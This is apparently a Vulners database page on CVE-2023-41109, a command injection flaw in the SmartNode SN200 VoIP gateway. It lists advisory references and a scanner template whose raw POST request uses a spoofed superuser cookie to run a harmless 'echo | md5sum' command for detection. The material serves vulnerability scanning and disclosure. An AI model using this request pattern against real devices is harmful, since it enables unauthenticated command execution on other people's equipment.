| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| SmartNode SN200 3.21.2-23021 OS Command Injection Vulnerability | 28 Nov 202300:00 | – | zdt | |
| CVE-2023-41109 | 28 Aug 202320:15 | – | attackerkb | |
| The vulnerability of the Network Diagnostic Commands function in the microprogramming software of the SmartNode SN200 adapter allows a perpetrator to compromise the confidentiality, integrity, and accessibility of the protected information. | 22 Jan 202400:00 | – | bdu_fstec | |
| CVE-2023-41109 | 29 Aug 202300:16 | – | circl | |
| SySS SmartNode SN200 操作系统命令注入漏洞 | 28 Aug 202300:00 | – | cnnvd | |
| CVE-2023-41109 | 28 Aug 202300:00 | – | cve | |
| CVE-2023-41109 | 28 Aug 202300:00 | – | cvelist | |
| CVE-2023-41109 | 28 Aug 202320:15 | – | nvd | |
| CVE-2023-41109 | 28 Aug 202320:15 | – | osv | |
| SmartNode SN200 3.21.2-23021 OS Command Injection | 28 Nov 202300:00 | – | packetstorm |
id: CVE-2023-41109
info:
name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
author: princechaddha
severity: critical
description: |
The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
remediation: |
Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
- https://nvd.nist.gov/vuln/detail/CVE-2023-41109
- http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html
- http://seclists.org/fulldisclosure/2023/Nov/12
- https://www.syss.de/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-41109
cwe-id: CWE-78
epss-score: 0.64113
epss-percentile: 0.99128
cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: patton
product: smartnode_sn200
tags: cve,cve2023,smartnode,voip,patton,vkev,vuln
variables:
payload: "echo CVE-2023-41109 | md5sum"
http:
- raw:
- |
POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
Host: {{Hostname}}
Cookie: AuthToken=; AuthGroup=superuser; UserName=admin
{"cmd":"{{payload}}","arguments":[]}
matchers:
- type: word
part: body
words:
- "dd556350275e2ee0a2e877cea9c8a74a"
# digest: 490a0046304402206ab34e862ddbcaddcd175680c73e908f8d53d3f85209d190062a15e2b823fbcd02203dd371bf1a6a20a26c9de090c8322784770cc3bae2f215241b54379b569fc681:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation